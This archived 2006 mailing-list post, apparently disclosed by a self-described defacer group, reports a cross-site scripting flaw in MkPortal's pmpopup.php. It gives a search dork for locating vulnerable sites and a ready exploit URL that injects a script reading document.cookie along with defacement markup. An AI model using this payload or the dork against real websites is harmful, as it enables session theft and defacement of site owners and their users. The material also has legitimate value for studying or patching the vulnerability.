|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
MkPortal Cross Site Scripting (All versions) xSS
vannovax
gmail.com
Date: Wed Sep 27 2006 - 15:27:13 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
#By: HanowarS
#mail: vannovax[at]gmail.com
#Greetz: Nettoxic, _Antrax_, Fr34k, SSH-2, xarnuz
#web: www.div.com.ve and www.c-group.org
#ALL VERSIONS!!
# Latin American Defacers
############################
Dork:
MKPortal M1.1 Rc1 ©2003-2005 All rights reserved
Hilo:
/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>
Affected File:
pmpopup.php
Example:
http://www.example.com/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]